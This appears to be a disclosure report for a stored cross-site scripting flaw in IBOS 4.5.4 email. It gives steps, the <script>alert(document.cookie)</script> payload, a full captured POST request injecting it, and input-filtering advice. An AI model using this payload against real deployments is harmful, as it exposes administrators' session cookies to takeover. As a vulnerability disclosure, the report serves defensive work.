代码拉取完成,页面将自动刷新
os: windows
IBOS version: 4.5.4
Discovery time: 2020/1/12
download IBOS time: 2020/1/9
Create a new account test1 with normal user permissions

login in the test1 and enter the email.

Send email to Super Administrator

Perform packet capture to modify the content sent,modify the emailbody[content] parameter value and add the payload like <script>alert(document.cookie)</script> and "Forward" it.

<script>alert(document.cookie)</script>
and the test packet is like this.
POST /?r=email/content/add HTTP/1.1
Host: 192.168.126.141:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 423
Origin: [http://192.168.126.141:8090](http://192.168.126.141:8090)
Connection: close
Referer: [http://192.168.126.141:8090/?r=email/content/add](http://192.168.126.141:8090/?r=email/content/add)
Cookie: JV66_saltkey=R62zxTJ6; PHPSESSID=gsbu4no765jlira852mg7mp2b0; JV66_sid=K5NrmE; lastautologin=0; JV66_lastactivity=1578840035; JV66_ulastactivity=bd03C060mWlgg1zpb4SMJXTC9%2FA1PYx734o%2BZjxQ8U7Cnun%2FGGM0; JV66_lately.SelectBox=u_1; JV66_creditremind=0D0D2D1D0D0D5; JV66_creditbase=0D0D4D1D0D0; JV66_creditrule=%E5%86%99%E9%82%AE%E4%BB%B6; JV66_dropnotify=%7B%22user%22%3A%221%22%2C%22unread_notify%22%3A1%2C%22unread_atme%22%3A0%2C%22unread_comment%22%3A0%2C%22unread_message%22%3A0%2C%22new_folower_count%22%3A0%2C%22unread_total%22%3A1%7D
Upgrade-Insecure-Requests: 1
emailbody%5Btoids%5D=u_1&emailbody%5BisOtherRec%5D=0&emailbody%5BisWebRec%5D=0&emailbody%5Bcopytoids%5D=&emailbody%5Bsecrettoids%5D=&emailbody%5Bimportant%5D=0&emailbody%5Bsubject%5D=aaaaaaaaaaaaaaaaa&file=&emailbody%5Battachmentid%5D=&emailbody%5Bissend%5D=1&op=new&backurl=http%3A%2F%2F192.168.126.141%3A8090%2F%3Fr%3Demail%2Flist%2Findex&formhash=0ea1467f&emailbody%5Bcontent%5D=%3Cp%3Eaaassssssssss%3Cbr%2F%3E%3C%2Fp%3E<script>alert(document.cookie)</script>
login the super manager and receive the email

look the email content and it will run evil javascript code.Then it will show the cookie value

filter or encode special characters like this
<
>
"
'
&
%
... ...
and filter some keyword like this
script
javascript
... ...
or filter some label function which can run javascript like this
onclick
onerror
onload
... ...